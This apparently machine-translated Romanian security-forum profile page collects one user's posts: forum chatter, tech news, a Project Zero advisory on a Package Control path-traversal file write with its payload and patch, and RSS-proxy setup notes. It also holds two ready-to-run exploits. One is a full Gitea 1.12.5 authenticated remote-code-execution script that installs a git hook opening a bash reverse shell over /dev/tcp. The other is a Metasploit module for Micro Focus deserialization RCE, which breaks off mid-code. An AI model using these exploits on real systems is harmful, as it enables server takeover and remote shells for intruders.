Kev

Everything posted by Kev

  1. OK, so I have the following Login.php code: I'm trying to protect index.html. Where am I going wrong? Line 40: Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /home/hosting/Login.php on line 40 Edit: I changed the " Line 65: Parse error: syntax error, unexpected $end in /home/hosting/Login.php on line 65 Thanks
  2. Facebook has removed a group of China-based hackers it says targeted members of the Uighur community living abroad. It said hackers used malicious websites and apps to infect devices and allow for remote surveillance, with journalists and activists targeted. A majority of the cyber attacks didn't happen directly on Facebook but used the social media platform to share links to infected sites. This is not the first time hackers have been accused of such activity.

The Uighurs are originally from the north-western region of Xinjiang in China and those targeted are currently living in places including Turkey, the United States, Australia and Canada. Facebook said it removed accounts - which totalled fewer than 100 - it found to have been created by the hackers, a group known as Earth Empusa or Evil Eye. It believes fewer than 500 accounts were targeted.

Facebook says some of the ways the group infected devices included:
  • creating fake Uighur-themed apps for the Android app store, including a prayer app and a dictionary app
  • posing on Facebook as journalists, students, human rights advocates or members of the Uighur community, building trust and tricking them into clicking on malicious links
  • creating look-alike websites for popular Uighur and Turkish news websites

The Chinese Embassy in Washington has yet to comment. China is facing mounting criticism from around the world over its treatment of the mostly Muslim Uighur population in Xinjiang. Rights groups believe China has detained more than a million Uighurs over the past few years. China denies allegations of abuse, saying camps in the region are "re-education" facilities used to combat terrorism. Via bbc.com
  3. Thanks for the reply. The person I talked to mentioned Code Snippets; we'll make a tutorial and post it here.
  4. I'm contributing on the hardware side (I have some new parts left in stock)
  5. Concretely, I'll help you: "blackfriday bot Wav3". Good luck!
  6. Privacy. Are we there yet? No, but there's some progress at least

When version 90 of Google's Chrome browser arrives in mid-April, initial website visits will default to a secure HTTPS connection in the event the user has failed to specify a preferred URI scheme. Lack of security is currently the norm in Chrome. As Google Chrome software engineers Shweta Panditrao and Mustafa Emre Acer explain in a blog post, when a user types "www.example.com" into Chrome's omnibox, without either an "http://" or "https://" prefix, Chrome chooses "http://". The same is true in other browsers like Brave, Edge, Mozilla, and Safari.

This made sense in the past when most websites had not implemented support for HTTPS. It was only in 2018 that the majority of websites redirected traffic to HTTPS. But these days, most of the web pages loaded rely on secure transport (ranging from about 98 per cent on Chrome to about 77 per cent on Linux). And among the top 100 websites, 97 of them currently default to HTTPS.

Previously, only websites that declared they should be loaded securely with an entry on an HTTP Strict Transport Security (HSTS) preload list – supported in multiple browsers – got HTTPS automatically. Chrome 90 will make HTTPS the default for first time website visits where no transport has been declared. Beyond the security and privacy benefits, say Panditrao and Acer, this will improve performance since the delay incurred by redirection from an http:// endpoint to an https:// endpoint will no longer happen.

A few exceptions will persist, however. IP addresses, single label domains (e.g. contoso without a TLD like .com), and reserved hostnames like localhost/ will still default to http://.

Private like a fox

In other browser-related news, Mozilla Firefox 87 debuted on Tuesday with a privacy feature called SmartBlock. Borrowing from techniques used by privacy-focused extensions NoScript and uBlock Origin (e.g. "stub scripts"), SmartBlock provides a way to block tracking scripts while attempting to minimize performance-affecting delays or errors that can arise from meddling with webpage code. Firefox SmartBlock can replace trackers found on the extensive Disconnect Tracking Protection List, which just for the US numbers well over a thousand.

Firefox 87 also incorporates another privacy enhancement: it will limit the information contained in the referrer (misspelled but implemented as "Referer") header string by setting its default Referrer-Policy to "strict-origin-when-cross-origin." What this means is that when a Firefox user follows a link like "https://www.example.com/path?query" – where "path" and "query" represent more meaningful or sensitive information – the HTTP Referer header that gets sent to the visited website will indicate that the visitor has arrived from "https://www.example.com" and the extra path and query data will be dropped. ®

Via theregister.com
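To make the two behaviours in this article concrete, here is an added Python sketch (not code from Google, Mozilla or The Register) of both rules: the omnibox scheme choice with the stated exceptions, and the Referer value a browser sends under the old no-referrer-when-downgrade default versus Firefox 87's strict-origin-when-cross-origin. PLAIN_HTTP_HOSTS and the host/port parsing are assumptions; the real browser heuristics have more cases.

```python
import ipaddress
from urllib.parse import urlsplit, urlunsplit

# Reserved hostnames that stay on http:// (assumption: only "localhost"
# is modelled here; Chrome's real list is longer).
PLAIN_HTTP_HOSTS = {"localhost"}


def default_scheme(typed):
    """Expand an omnibox entry the way the article describes Chrome 90:
    an explicit scheme wins; IP addresses, single-label names and
    localhost stay on http://; everything else gets https://."""
    if typed.startswith(("http://", "https://")):
        return typed
    # crude host extraction: drop any path, then any trailing :port
    host = typed.split("/", 1)[0].rsplit(":", 1)[0].lower()
    try:
        ipaddress.ip_address(host.strip("[]"))
        is_ip = True
    except ValueError:
        is_ip = False
    if is_ip or host in PLAIN_HTTP_HOSTS or "." not in host:
        return "http://" + typed
    return "https://" + typed


def _host(parts):
    # hostname drops any user:password@ credentials, which must never leak
    return parts.hostname + (":%d" % parts.port if parts.port else "")


def referer_header(policy, source_url, destination_url):
    """Return the Referer value sent when navigating from source_url to
    destination_url under the given Referrer-Policy, or None for no header.
    Only the two policies contrasted in the article are modelled."""
    src, dst = urlsplit(source_url), urlsplit(destination_url)
    # "stripped" referrer: credentials and #fragment removed, path/query kept
    stripped = urlunsplit((src.scheme, _host(src), src.path or "/", src.query, ""))
    origin = "%s://%s/" % (src.scheme, _host(src))
    downgrade = src.scheme == "https" and dst.scheme != "https"
    same_origin = (src.scheme, _host(src)) == (dst.scheme, _host(dst))
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else stripped
    if policy == "strict-origin-when-cross-origin":
        if same_origin:
            return stripped
        return None if downgrade else origin
    raise ValueError("policy not modelled here: %r" % policy)


if __name__ == "__main__":
    for typed in ("www.example.com", "192.168.1.10:8080", "contoso", "localhost/"):
        print("%-20s -> %s" % (typed, default_scheme(typed)))
    link = "https://www.example.com/path?query"
    for policy in ("no-referrer-when-downgrade", "strict-origin-when-cross-origin"):
        print(policy, "->", referer_header(policy, link, "https://news.example.org/"))
```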
  7. he's not the only one; a few years ago the U.S. Navy took a selfie with a board in the background on which the MySql123 password was written
  8. Hi. On a WordPress travel blog with the Meow Gallery plugin installed, I want all the images I upload to be renamed automatically, e.g.: directory: Constanta Costinesti.jpg Costinesti-01.jpg Costinesti-02.jpg Costinesti-03.jpg ... Brasov CastelulBran.jpg CastelulBran1.jpg CastelulBran2.jpg CastelulBran3.jpg ... What do I need to fill in in the Advanced Custom Fields field? Thanks in advance
  9. Keep playing
  10. Kev

    Good evening

    Welcome! Hey, listen up: the nickname Ioutzi is a little willy, don't get worked up
  11. grep Edit: You're welcome https://www.digitalocean.com/community/tutorials/using-grep-regular-expressions-to-search-for-text-patterns-in-linux
  12. Subscribe: the sources are listed in the ToS. Edit: In other words: you're on your own with whatever junk you find in the trash
  13. Package Control suffers from an arbitrary file write vulnerability.

Package Control: Arbitrary File Write on packagecontrol.io

Package Control is a popular package manager for Sublime Text with over 19.77M users and around 65k daily package installs. packagecontrol.io is its main website and hosts the default channel (https://packagecontrol.io/channel_v3.json) used for installing and updating packages.

packagecontrol.io supports validation of Package Control's Repository JSON format via the packagecontrol.io/test_repo endpoint. This endpoint passes the (JSON-decoded) POST body directly to the run_tests function defined in app/lib/run_repo_tests.py (https://github.com/wbond/packagecontrol.io/blob/1629533ad44cbea6258a172876f06e1bbb7db14f/app/lib/run_repo_tests.py#L69):

While the overall validation logic is somewhat complex, we are only interested in the final steps where a package is downloaded and its content analyzed. Most packages are hosted on GitHub or Bitbucket and use branch or tag based version management, but it is still possible to manually specify a download URL by using a JSON configuration like the one shown below:

```json
{
  "name": "test",
  "author": "Felix Wilhelm",
  "releases": [
    {
      "version": "2.0.0",
      "url": "http://plugin-host/package.zip",
      "date": "2021-02-25 10:00:00",
      "sublime_text": "*"
    }
  ]
}
```

For configurations like this, the validation routine downloads the package ZIP file from the user supplied URL, extracts it and runs a number of "file checkers" on the package files.
This is implemented in the code snippet shown below (the markers (A) to (E) are referenced in the analysis that follows):

```python
tmpdir = tempfile.mkdtemp()
if not tmpdir:
    return build_result([format_report('Could not create temp dir')], [])

tmp_package_path = os.path.join(tmpdir, '%s.sublime-package' % name)  # (A)
tmp_package_dir = os.path.join(tmpdir, name)  # (B)
os.mkdir(tmp_package_dir)

with open(tmp_package_path, 'wb') as package_file, downloader(url, settings) as manager:
    try:
        package_file.write(manager.fetch(url, 'fetching package'))
    except DownloaderException as e:
        ...

with zipfile.ZipFile(tmp_package_path, 'r') as package_zip:
    # Scan through the root level of the zip file to gather some info
    root_level_paths = []
    last_path = None
    for path in package_zip.namelist():
        if not isinstance(path, str):
            path = path.decode('utf-8', 'strict')
        last_path = path
        if path.find('/') in [len(path) - 1, -1]:
            root_level_paths.append(path)
        # Make sure there are no paths that look like security vulnerabilities
        if path[0] == '/' or '../' in path or '..\\' in path:  # (C)
            errors.append(format_report('The path "%s" appears to be attempting to access other parts of the filesystem' % path))
            return build_result(errors, warnings)

    if last_path and len(root_level_paths) == 0:
        root_level_paths.append(last_path[0:last_path.find('/') + 1])

    # If there is only a single directory at the top level, the file
    # is most likely a zip from BitBucket or GitHub and we need
    # to skip the top-level dir when extracting
    skip_root_dir = len(root_level_paths) == 1 and \
        root_level_paths[0].endswith('/')

    for path in package_zip.namelist():
        dest = path
        if not isinstance(dest, str):
            dest = dest.decode('utf-8', 'strict')

        # If there was only a single directory in the package, we remove
        # that folder name from the paths as we extract entries
        if skip_root_dir:
            dest = dest[len(root_level_paths[0]):]

        dest = dest.replace('\\', '/')  # (D)
        dest = os.path.join(tmp_package_dir, dest)
        dest = os.path.abspath(dest)

        # Make sure there are no paths that look like security vulnerabilities
        if not dest.startswith(tmp_package_dir):  # (E)
            errors.append(format_report('The path "%s" appears to be attempting to access other parts of the filesystem' % path))
            return build_result(errors, warnings)

        if path.endswith('/'):
            if not os.path.exists(dest):
                os.makedirs(dest)
        else:
            dest_dir = os.path.dirname(dest)
            if not os.path.exists(dest_dir):
                os.makedirs(dest_dir)
            with open(dest, 'wb') as f:
                f.write(package_zip.read(path))

tmp_package_dir_pathlib = pathlib.Path(tmp_package_dir)
for checker in file_checkers.get_checkers():
    ...
```

The code first creates a temporary directory to store both the zip archive and the extracted content. It then downloads the zip archive and tries to extract all files while making sure that no directory traversal attacks can be used to write to locations outside of the temporary directory. However, there are multiple problems that still make such an attack possible:

1. The name variable is coming from the attacker controlled JSON file and used without any validation (A). This makes it possible to create arbitrary directories by using a directory traversal "../../../../tmp/test" or even an absolute file path "/tmp/test" as the name field of the package. Absolute paths work because os.path.join has the following feature: "If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component." (https://docs.python.org/3/library/os.path.html)

2. We can also create an arbitrary file with controlled content and the ending ".sublime-package" somewhere on the file system (B). On most systems this should already be enough to get arbitrary code execution.

3. However, we can use another bug to create files with controlled content and a controlled name: While the code checks for absolute file paths and directory traversal attempts in all compressed file paths (C), it does not check for absolute file paths starting with a backslash.
This is a problem, because backslashes get converted to forward slashes in (D). We can use this behavior and the os.path.join call to put an arbitrary path in the dest variable by using a file path like "\tmp/test". The final check in (E) is not a problem for an attacker as tmp_package_dir is completely attacker controlled (see 1.)

Putting this together, an attacker can write arbitrary files on the packagecontrol.io host by combining a JSON payload like

```json
{
  "name": "/tmp/test",
  "author": "Felix Wilhelm",
  "releases": [
    {
      "version": "2.0.0",
      "url": "http://plugin-host/evil.zip",
      "date": "2021-02-25 10:00:00",
      "sublime_text": "*"
    }
  ]
}
```

with a zip file with the following contents (see attachment):

```
unzip -l evil.zip
Archive:  evil.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
       10  2021-02-25 11:22   \tmp/test1234
        0  2021-02-25 11:30   a/
        0  2021-02-25 11:30   b/
---------                     -------
       10                     3 files
```

This will create the file /tmp/test1234 (and a directory /tmp/test). A practical attack would either try to achieve RCE by overwriting some script files or directly backdoor channel_v3.json to push malicious updates to Package Control users.

Fix Suggestion: The patch below should fix the described issues in the short term. However, I think a better way to address these issues would be to move the whole validation logic (including the file checkers) into a low privileged/sandboxed context. This would reduce the risk of similar bugs popping up.

```diff
diff --git a/app/lib/run_repo_tests.py b/app/lib/run_repo_tests.py
index d80895a..8bfdc01 100644
--- a/app/lib/run_repo_tests.py
+++ b/app/lib/run_repo_tests.py
@@ -112,6 +112,10 @@ def run_tests(spec):
     settings = downloader_settings()
     name = info['name']
 
+    if '/' in name or '\\' in name:
+        errors.append(format_report('The name "%s" contains invalid characters' % name))
+        return build_result(errors, warnings)
+
     tmpdir = tempfile.mkdtemp()
     if not tmpdir:
         return build_result([format_report('Could not create temp dir')], [])
```
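Review bot: `name` comes straight from the attacker-controlled JSON, so the new `if '/' in name or '\\' in name:` should first confirm that `name` is actually a string; on an int from the decoded body `'/' in name` raises TypeError and the request fails with an unhandled exception, while a list only trips the check if one of its elements is exactly '/'. A positive allowlist for the characters a package name may contain (which also rejects an empty name) would be more robust than a two-character blocklist, and keeps the error report meaningful.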
```diff
@@ -140,7 +144,7 @@ def run_tests(spec):
             if path.find('/') in [len(path) - 1, -1]:
                 root_level_paths.append(path)
             # Make sure there are no paths that look like security vulnerabilities
-            if path[0] == '/' or '../' in path or '..\\' in path:
+            if path[0] == '/' or path[0]=='\\' or '../' in path or '..\\' in path:
                 errors.append(format_report('The path "%s" appears to be attempting to access other parts of the filesystem' % path))
                 return build_result(errors, warnings)
 
```

There is also a pretty big risk of SSRF attacks, as the download manager does not perform any validation of the url prior to fetching it. For example, an attacker could use this to send requests to the redis instance listening on localhost. This is pretty difficult to fix correctly so one idea might be to remove support for non github/bitbucket packages (and therefore attacker specified URLs) from run_repo_tests.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-05-26. Disclosure at an earlier date is also possible if agreed upon by all parties.

Found by: fwilhelm@google.com

Download GS20210226161937.tgz (3.9 KB)
Source
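Review bot: `path[0]=='\\'` should be spaced `path[0] == '\\'` to match the rest of the condition. The amended line still indexes `path[0]` before checking that the entry name is non-empty, so an empty filename in the archive raises IndexError instead of producing a report; testing `not path` first, then running `os.path.isabs` and a split on '/' for any `..` component over the normalised form `path.replace('\\', '/')`, would cover both separators in one place rather than enumerating `'../'` and `'..\\'` separately.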
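A defensive counterpart to the analysis above, added here and not part of the report or of packagecontrol.io's code: flawed_dest reproduces steps (D) and (E) exactly as the text describes them, safe_dest and package_name_ok are a hardened replacement, and check_archive validates a constructed in-memory zip carrying the same \tmp/test1234 entry before anything is written. The allowlist regex and the /tmp/test extraction root are assumptions.

```python
import io
import os
import re
import zipfile

# Allowlist for the JSON "name" field: one plain path component (assumption;
# packagecontrol.io's own naming rules may differ).
PACKAGE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._-]{0,127}$")


class UnsafePath(ValueError):
    """A package name or archive entry would reach outside the temp dir."""


def package_name_ok(name):
    """True only for a plain component: no separators, no '.'/'..', not empty."""
    return isinstance(name, str) and PACKAGE_NAME_RE.match(name) is not None


def flawed_dest(entry, tmp_package_dir):
    """Steps (D) and (E) as the page describes them: backslashes become '/'
    *before* os.path.join, so an entry starting with '\\' turns absolute,
    os.path.join discards tmp_package_dir, and startswith() still passes
    whenever tmp_package_dir happens to be a prefix of the result."""
    dest = entry.replace("\\", "/")
    dest = os.path.abspath(os.path.join(tmp_package_dir, dest))
    if not dest.startswith(tmp_package_dir):
        raise UnsafePath(entry)
    return dest


def safe_dest(entry, extract_root):
    """Hardened replacement: normalise separators first, reject absolute and
    drive-letter paths and any '..' component, then confirm the resolved path
    is inside the root with an ancestor test rather than startswith() (which
    would accept '/tmp/test-other' for a root of '/tmp/test')."""
    if not isinstance(entry, str) or not entry:
        raise UnsafePath("empty or non-string entry name")
    rel = entry.replace("\\", "/")
    if rel.startswith("/") or re.match(r"^[A-Za-z]:", rel):
        raise UnsafePath("absolute entry path: %r" % entry)
    if ".." in rel.split("/"):
        raise UnsafePath("parent-directory component in %r" % entry)
    root = os.path.realpath(extract_root)
    dest = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, dest]) != root:
        raise UnsafePath("entry escapes extraction root: %r" % entry)
    return dest


def entry_ok(entry, extract_root):
    try:
        safe_dest(entry, extract_root)
    except UnsafePath:
        return False
    return True


def check_archive(zip_bytes, extract_root):
    """Validate every entry of an in-memory zip before anything is written;
    returns [(entry, destination), ...] or raises on the first unsafe entry."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [(e, safe_dest(e, extract_root)) for e in zf.namelist()]


def archive_ok(zip_bytes, extract_root):
    try:
        check_archive(zip_bytes, extract_root)
    except UnsafePath:
        return False
    return True


def build_zip(entries):
    """Constructed sample archive (not the attachment from the report);
    writestr() stores the entry names verbatim on POSIX."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries:
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    root = "/tmp/test"  # what the JSON "name" field produced in the report
    print("flawed check lets through:", flawed_dest("\\tmp/test1234", root))
    print("hardened check rejects it:", not entry_ok("\\tmp/test1234", root))
    evil = build_zip([("\\tmp/test1234", b"0123456789"), ("a/", b""), ("b/", b"")])
    good = build_zip([("pkg/", b""), ("pkg/main.py", b"print('hi')\n")])
    print("evil.zip ok?", archive_ok(evil, root), "| benign zip ok?", archive_ok(good, root))
```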
  14. Kev

    Useful stuff

    For the ambidextrous. Link: https://aposymbiont.github.io/split-keyboards/
  15. Gitea version 1.12.5 suffers from a remote code execution vulnerability.

```python
# Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated)
# Date: 17 Feb 2020
# Exploit Author: Podalirius
# PoC demonstration article: https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
# Vendor Homepage: https://gitea.io/
# Software Link: https://dl.gitea.io/
# Version: >= 1.1.0 to <= 1.12.5
# Tested on: Ubuntu 16.04 with GiTea 1.6.1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import os
import pexpect
import random
import re
import sys
import time
import requests

requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
    pass


class GiTea(object):
    def __init__(self, host, verbose=False):
        super(GiTea, self).__init__()
        self.verbose = verbose
        self.host = host
        self.username = None
        self.password = None
        self.uid = None
        self.session = None

    def _get_csrf(self, url):
        # Poll the page until the _csrf meta tag is present
        pattern = r'name="_csrf" content="([a-zA-Z0-9\-\_=]+)"'
        csrf = []
        while len(csrf) == 0:
            r = self.session.get(url)
            csrf = re.findall(pattern, r.text)
            time.sleep(1)
        csrf = csrf[0]
        return csrf

    def _get_uid(self, url):
        pattern = r'name="_uid" content="([0-9]+)"'
        uid = re.findall(pattern, self.session.get(url).text)
        while len(uid) == 0:
            time.sleep(1)
            uid = re.findall(pattern, self.session.get(url).text)
        uid = uid[0]
        return int(uid)

    def login(self, username, password):
        if self.verbose == True:
            print(" [>] login('%s', ...)" % username)
        self.session = requests.Session()
        r = self.session.get('%s/user/login' % self.host)
        self.username = username
        self.password = password
        # Logging in
        csrf = self._get_csrf(self.host)
        r = self.session.post(
            '%s/user/login?redirect_to=%%2f%s' % (self.host, self.username),
            data={'_csrf': csrf, 'user_name': username, 'password': password},
            allow_redirects=True
        )
        if b'Username or password is incorrect.' in r.content:
            return False
        else:
            # Getting User id
            self.uid = self._get_uid(self.host)
            return True

    def repo_create(self, repository_name):
        if self.verbose == True:
            print(" [>] Creating repository : %s" % repository_name)
        csrf = self._get_csrf(self.host)
        # Create repo
        r = self.session.post(
            '%s/repo/create' % self.host,
            data={
                '_csrf': csrf,
                'uid': self.uid,
                'repo_name': repository_name,
                'description': "Lorem Ipsum",
                'gitignores': '',
                'license': '',
                'readme': 'Default',
                'auto_init': 'off'
            }
        )
        return None

    def repo_delete(self, repository_name):
        if self.verbose == True:
            print(" [>] Deleting repository : %s" % repository_name)
        csrf = self._get_csrf('%s/%s/%s/settings' % (self.host, self.username, repository_name))
        # Delete repository
        r = self.session.post(
            '%s/%s/%s/settings' % (self.host, self.username, repository_name),
            data={
                '_csrf': csrf,
                'action': "delete",
                'repo_name': repository_name
            }
        )
        return

    def repo_set_githook_pre_receive(self, repository_name, content):
        if self.verbose == True:
            print(" [>] repo_set_githook_pre_receive('%s')" % repository_name)
        csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name))
        # Set pre receive git hook
        r = self.session.post(
            '%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name),
            data={
                '_csrf': csrf,
                'content': content
            }
        )
        return

    def repo_set_githook_update(self, repository_name, content):
        if self.verbose == True:
            print(" [>] repo_set_githook_update('%s')" % repository_name)
        csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name))
        # Set update git hook
        r = self.session.post(
            '%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name),
            data={
                '_csrf': csrf,
                'content': content
            }
        )
        return

    def repo_set_githook_post_receive(self, repository_name, content):
        if self.verbose == True:
            print(" [>] repo_set_githook_post_receive('%s')" % repository_name)
        csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name))
        # Set post receive git hook
        r = self.session.post(
            '%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name),
            data={
                '_csrf': csrf,
                'content': content
            }
        )
        return

    def logout(self):
        if self.verbose == True:
            print(" [>] logout()")
        # Logging out
        r = self.session.get('%s/user/logout' % self.host)
        return None


def trigger_exploit(host, username, password, repository_name, verbose=False):
    # Create a temporary directory
    tmpdir = os.popen('mktemp -d').read().strip()
    os.chdir(tmpdir)
    # We create some files in the repository
    os.system('touch README.md')
    rndstring = ''.join([hex(random.randint(0, 15))[2:] for k in range(32)])
    os.system('echo "%s" >> README.md' % rndstring)
    os.system('git init')
    os.system('git add README.md')
    os.system('git commit -m "Initial commit"')
    # Connect to remote source repository
    os.system('git remote add origin %s/%s/%s.git' % (host, username, repository_name))
    # Push the files (it will trigger post-receive git hook)
    conn = pexpect.spawn("/bin/bash -c 'cd %s && git push -u origin master'" % tmpdir)
    conn.expect("Username for .*: ")
    conn.sendline(username)
    conn.expect("Password for .*: ")
    conn.sendline(password)
    conn.expect("Total.*")
    print(conn.before.decode('utf-8').strip())
    return None


def header():
    print(r"""
  _____ _ _______
 / ____(_)__   __|          CVE-2020-14144
| |  __ _   | | ___  __ _
| | |_ | |  | |/ _ \/ _` |  Authenticated Remote Code Execution
| |__| | |  | |  __/ (_| |
 \_____|_|  |_|\___|\__,_|  GiTea versions >= 1.1.0 to <= 1.12.5
""")


if __name__ == '__main__':
    header()
    parser = argparse.ArgumentParser(description='Process some integers.')
    parser.add_argument('-v', '--verbose', required=False, default=False, action='store_true', help='Increase verbosity.')
    parser.add_argument('-t', '--target', required=True, type=str, help='Target host (http://..., https://... or domain name)')
    parser.add_argument('-u', '--username', required=True, type=str, default=None, help='GiTea username')
    parser.add_argument('-p', '--password', required=True, type=str, default=None, help='GiTea password')
    parser.add_argument('-I', '--rev-ip', required=False, type=str, default=None, help='Reverse shell listener IP')
    parser.add_argument('-P', '--rev-port', required=False, type=int, default=None, help='Reverse shell listener port')
    parser.add_argument('-f', '--payload-file', required=False, default=None, help='Path to shell script payload to use.')
    args = parser.parse_args()

    if (args.rev_ip == None or args.rev_port == None):
        if args.payload_file == None:
            print('[!] Either (-I REV_IP and -P REV_PORT) or (-f PAYLOAD_FILE) options are needed')
            sys.exit(-1)

    # Read specific payload file
    if args.payload_file != None:
        f = open(args.payload_file, 'r')
        hook_payload = ''.join(f.readlines())
        f.close()
    else:
        hook_payload = """#!/bin/bash\nbash -i >& /dev/tcp/%s/%d 0>&1 &\n""" % (args.rev_ip, args.rev_port)

    if args.target.startswith('http://'):
        pass
    elif args.target.startswith('https://'):
        pass
    else:
        args.target = 'https://' + args.target

    print('[+] Starting exploit ...')
    g = GiTea(args.target, verbose=args.verbose)
    if g.login(args.username, args.password):
        reponame = 'vuln'
        g.repo_delete(reponame)
        g.repo_create(reponame)
        g.repo_set_githook_post_receive(reponame, hook_payload)
        g.logout()
        trigger_exploit(g.host, g.username, g.password, reponame, verbose=args.verbose)
        g.repo_delete(reponame)
    else:
        print('\x1b[1;91m[!]\x1b[0m Could not login with these credentials.')
    print('[+] Exploit completed !')
```

Source
  16. I only just noticed the topic, before replying to your PM; I don't understand. Edit: text you haven't had your coffee, are you asleep or what, can't you hear that the guy wants to upload and download databases
  17. Kev

    Greetings

    you have a PM
  18. Puie Monta % $ 1000,000,000,000,000,00 st I dedicate it to you for all my love, Diavola, in front of ANAF
  19. Kev

    RSS-proxy

    RSS-proxy is a tool that allows you to create an RSS/ATOM or JSON feed of almost any website, purely by analyzing just the static HTML structure. Try the live demo.

    Quickstart using docker
    The simplest way to use RSS-proxy is using docker:

```sh
docker pull damoeb/rss-proxy
docker run -p 3000:3000 -it damoeb/rss-proxy
```

    Then open localhost:3000 in the browser.

    JavaScript Support
    rss-proxy supports dynamic webapps in a separate docker image damoeb/rss-proxy:js, because at 1GB it is quite large. Running this image will render a checkbox in the User Interface to pre-render a website in a headless browser, rather than using the static response.

```sh
docker pull damoeb/rss-proxy:js
docker run -p 3000:3000 -it damoeb/rss-proxy:js
```

    Developing RSS-proxy
    The project is separated into three modules:
      • core: the feed parser logic, plain JavaScript
      • playground: the web app to visualize and explore feed generation
      • proxy: the expressjs server

    For local development you need node 12+. Then follow these steps:

```sh
# Install all npm dependencies
npm run install
# Start server
cd packages/proxy && npm run start
# Start client
cd packages/playground && npm run start
```

    Troubleshooting: see troubleshooting. Changelog: see changelog. Contributors: damoeb. Contact: https://twitter.com/damoeb. License: This project uses the following license: GNU GPLv3.

    Download: rss-proxy-master.zip or git clone https://github.com/damoeb/rss-proxy.git
    Source
  20. Items in bold have a bonus interactive toy! Link: https://beej.us/blog/ Source: Beej's Bit Bucket
  21. This Metasploit module exploits an authenticated Java deserialization that affects a truckload of Micro Focus products: Operations Bridge Manager, Application Performance Management, Data Center Automation, Universal CMDB, Hybrid Cloud Management and Service Management Automation. However, this module was only tested on Operations Bridge Manager. Exploiting this vulnerability will result in remote code execution as the root user on Linux or the SYSTEM user on Windows. Authentication is required as the module user needs to login to the application and obtain the authenticated LWSSO_COOKIE_KEY, which should be fed to the module. Any authenticated user can exploit this vulnerability, even the lowest privileged ones.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Micro Focus Operations Bridge Manager Authenticated Remote Code Execution',
        'Description' => %q{
          This module exploits an authenticated Java deserialization that affects a truckload
          of Micro Focus products: Operations Bridge Manager, Application Performance Management,
          Data Center Automation, Universal CMDB, Hybrid Cloud Management and Service Management
          Automation. However this module was only tested on Operations Bridge Manager.
          Exploiting this vulnerability will result in remote code execution as the root user
          on Linux or the SYSTEM user on Windows.
          Authentication is required, the module user needs to login to the application and
          obtain the authenticated LWSSO_COOKIE_KEY, which should be fed to the module.
          Any authenticated user can exploit this vulnerability, even the lowest privileged ones.
          For more information refer to the advisory link below.
        },
        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
        ],
        'References' => [
          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
          [ 'CVE', '2020-11853'],
          [ 'ZDI', '20-1327'],
        ],
        'DisclosureDate' => '2020-10-28',
        'License' => MSF_LICENSE,
        'Platform' => 'java',
        'Arch' => ARCH_JAVA,
        'Privileged' => true,
        'Targets' => [
          ['Micro Focus Operations Bridge Manager <= 2020.05 (and many other MF products)', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'java/meterpreter/reverse_tcp'
        }
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
      OptString.new('LWSSO_COOKIE_KEY', [true, 'Authenticated LWSSO_COOKIE_KEY session cookie'])
    ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/topaz/login.jsp')
    })

    # unfortunately could not find an easy way to detect the version running, even when auth
    if res && res.code == 200 && res.body.include?('Login - Operations Bridge Manager')
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Unknown
  end

  def exploit
    # Start our HTTP server to provide remote classloading
    @classloader_uri = start_service

    unless @classloader_uri
      fail_with(Failure::BadConfig, 'Could not start remote classloader server')
    end

    print_good("Started remote classloader server at #{@classloader_uri}")

    # heh, we got two of these, let's pick one randomly!
    vuln_uri = [
      '/legacy/topaz/sitescope/conf/registration',
      '/legacy/topaz/sitescope/conf/download'
    ].sample

    # Send our remote classloader gadget to the target, triggering the vuln
    send_request_gadget(
      normalize_uri(target_uri.path, vuln_uri)
    )
  end

  # Convenience method to send our gadget to a URI
  def send_request_gadget(uri)
    print_status("Sending remote classloader gadget to #{full_uri(uri)}")

    send_request_raw({
      'method' => 'POST',
      'uri' => uri,
      'cookie' => "LWSSO_COOKIE_KEY=#{datastore['LWSSO_COOKIE_KEY']}",
      'headers' => {
        'Content-Type' => 'application/octet-stream'
      },
      'data' => go_go_gadget
    }, 0)
  end

  # C3P0 payload generated with a ysoserial jar
  # The ysoserial jar needs to be built with c3p0 version 0.9.1.2 as that is what the target uses
  # See the advisory for details.
  #
